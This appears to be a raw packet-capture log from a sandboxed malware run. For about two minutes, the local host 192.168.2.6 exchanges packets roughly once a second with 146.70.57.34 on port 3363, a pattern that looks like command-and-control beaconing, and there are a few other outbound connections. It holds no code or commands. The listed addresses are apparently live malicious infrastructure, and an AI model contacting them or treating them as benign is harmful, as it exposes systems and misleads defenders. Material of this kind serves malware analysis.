                                        Jul 27, 2024 11:37:19.056633949 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:19.058371067 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:19.063352108 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:20.071616888 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:20.073045015 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:20.077920914 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:20.339030027 CEST44349709173.222.162.64192.168.2.6
                                        Jul 27, 2024 11:37:20.339260101 CEST49709443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:21.080749035 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:21.082355022 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:21.087697983 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:22.095192909 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:22.096920013 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:22.101934910 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:23.113445044 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:23.115253925 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:23.126279116 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:24.127834082 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:24.129421949 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:24.134258032 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:25.133390903 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:25.134901047 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:25.140527964 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:26.151036978 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:26.152690887 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:26.157546043 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:27.222865105 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:27.224361897 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:27.231431961 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:28.183362961 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:28.185679913 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:28.191235065 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:29.204915047 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:29.206785917 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:29.220418930 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:30.064515114 CEST49709443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:30.064515114 CEST49709443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:30.069426060 CEST44349709173.222.162.64192.168.2.6
                                        Jul 27, 2024 11:37:30.069468975 CEST44349709173.222.162.64192.168.2.6
                                        Jul 27, 2024 11:37:30.089776993 CEST49722443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:30.089833021 CEST44349722173.222.162.64192.168.2.6
                                        Jul 27, 2024 11:37:30.089888096 CEST49722443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:30.093035936 CEST49722443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:30.093050003 CEST44349722173.222.162.64192.168.2.6
                                        Jul 27, 2024 11:37:30.207866907 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:30.210546017 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:30.215518951 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:30.707302094 CEST44349722173.222.162.64192.168.2.6
                                        Jul 27, 2024 11:37:30.707390070 CEST49722443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:31.227945089 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:31.229789972 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:31.234703064 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:32.220624924 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:32.222280025 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:32.227116108 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:33.231988907 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:33.233628988 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:33.238652945 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:34.233243942 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:34.235399008 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:34.240509987 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:35.259773016 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:35.261540890 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:35.267232895 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:36.263556004 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:36.269798040 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:36.274688959 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:37.275921106 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:37.277621031 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:37.282617092 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:38.276699066 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:38.281359911 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:38.286423922 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:39.359533072 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:39.360902071 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:39.366272926 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:40.311736107 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:40.314187050 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:40.319154024 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:41.308547020 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:41.310516119 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:41.315741062 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:42.323973894 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:42.325683117 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:42.330954075 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:43.346481085 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:43.348047972 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:43.352982044 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:44.353158951 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:44.355030060 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:44.360058069 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:45.365320921 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:45.366976976 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:45.373212099 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:46.367383957 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:46.369193077 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:46.374056101 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:47.412494898 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:47.414665937 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:47.423196077 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:48.394057035 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:48.395731926 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:48.400769949 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:49.423289061 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:49.424823999 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:49.429815054 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:49.864243031 CEST44349722173.222.162.64192.168.2.6
                                        Jul 27, 2024 11:37:49.864311934 CEST49722443192.168.2.6173.222.162.64
                                        Jul 27, 2024 11:37:50.427714109 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:50.429733038 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:50.434779882 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:51.450366974 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:51.454094887 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:51.460719109 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:52.460309982 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:52.462136984 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:52.467003107 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:53.471999884 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:53.473414898 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:53.485268116 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:54.479012966 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:54.480706930 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:54.485686064 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:55.492048025 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:55.498127937 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:55.510360956 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:56.520879030 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:56.524714947 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:56.531582117 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:57.512132883 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:57.513571978 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:57.518702984 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:58.527652979 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:58.529819012 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:58.534744024 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:59.550592899 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:37:59.552308083 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:37:59.565045118 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:00.558458090 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:00.559926033 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:00.564928055 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:01.558301926 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:01.559976101 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:01.564937115 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:02.639600992 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:02.643177032 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:02.648772001 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:03.574340105 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:03.575917006 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:03.580804110 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:04.574629068 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:04.575907946 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:04.581736088 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:05.592696905 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:05.594000101 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:05.605190992 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:06.594659090 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:06.596010923 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:06.600994110 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:07.607494116 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:07.609621048 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:07.614697933 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:08.622457027 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:08.624073029 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:08.629122019 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:09.630465031 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:09.631932974 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:09.636758089 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:10.736273050 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:10.737662077 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:10.744946957 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:11.704823971 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:11.706310034 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:11.711244106 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:12.670176029 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:12.671765089 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:12.676794052 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:13.677902937 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:13.679126978 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:13.684113979 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:14.690116882 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:14.691313982 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:14.704803944 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:15.688668013 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:15.690165043 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:15.695070982 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:16.707135916 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:16.708502054 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:16.713644028 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:17.709827900 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:17.713929892 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:17.718904018 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:18.712726116 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:18.713929892 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:18.718879938 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:19.725784063 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:19.727117062 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:19.732152939 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:20.755034924 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:20.756500006 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:20.761293888 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:21.741880894 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:21.743016005 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:21.751089096 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:22.744469881 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:22.746064901 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:22.756479025 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:23.752756119 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:23.754312992 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:23.759329081 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:24.779572964 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:24.781435013 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:24.788321972 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:25.784617901 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:25.786171913 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:25.791986942 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:26.800214052 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:26.808768034 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:26.813796043 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:27.807657957 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:27.808800936 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:27.813852072 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:28.801548004 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:28.808763981 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:28.813705921 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:29.959450006 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:29.960917950 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:29.966305971 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:30.820974112 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:30.822165012 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:30.827128887 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:31.821825981 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:31.823260069 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:31.828425884 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:32.835196018 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:32.868779898 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:32.874193907 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:33.848861933 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:33.858705044 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:33.867799044 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:34.856940985 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:34.858238935 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:34.866595984 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:35.854231119 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:35.858315945 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:35.863146067 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:36.891896963 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:36.895283937 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:36.901212931 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:37.874083042 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:37.875332117 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:37.886548996 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:38.883028030 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:38.884505987 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:38.889385939 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:39.896058083 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:39.897773981 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:39.902658939 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:40.921962023 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:40.925906897 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:40.930922985 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:41.903040886 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:41.904190063 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:41.911273956 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:42.974172115 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:42.975419998 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:42.980989933 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:43.945415020 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:43.946568012 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:43.951761961 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:44.949780941 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:44.950932980 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:44.959587097 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:45.955708981 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:45.957191944 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:45.963424921 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:46.997045040 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:46.998131037 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:47.003101110 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:47.977577925 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:47.979382038 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:47.987248898 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:49.067070007 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:49.068156958 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:49.074887991 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:49.983844995 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:49.985445023 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:49.990569115 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:50.978437901 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:50.979768991 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:50.984718084 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:51.990164042 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:51.991951942 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:51.997080088 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:53.026036978 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:53.027209044 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:53.032145023 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:54.025511980 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:54.026814938 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:54.031779051 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:55.053694963 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:55.055119991 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:55.060046911 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:56.052099943 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:56.053206921 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:56.058306932 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:57.055526018 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:57.057034969 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:57.061965942 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:58.073359013 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:58.074489117 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:58.079758883 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:59.081376076 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:38:59.086407900 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:38:59.096508980 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:00.089010000 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:00.090590954 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:00.095628023 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:01.086739063 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:01.088222980 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:01.094729900 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:02.101416111 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:02.102659941 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:02.107611895 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:03.138886929 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:03.140376091 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:03.148981094 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:04.126518011 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:04.127746105 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:04.132674932 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:05.128232002 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:05.129494905 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:05.134864092 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:06.136249065 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:06.137649059 CEST497163363192.168.2.6146.70.57.34
                                        Jul 27, 2024 11:39:06.142561913 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:06.420819998 CEST4971880192.168.2.6178.237.33.50
                                        Jul 27, 2024 11:39:06.904781103 CEST4971880192.168.2.6178.237.33.50
                                        Jul 27, 2024 11:39:07.173629045 CEST336349716146.70.57.34192.168.2.6
                                        Jul 27, 2024 11:39:07.176506996 CEST497163363192.168.2.6146.70.57.34
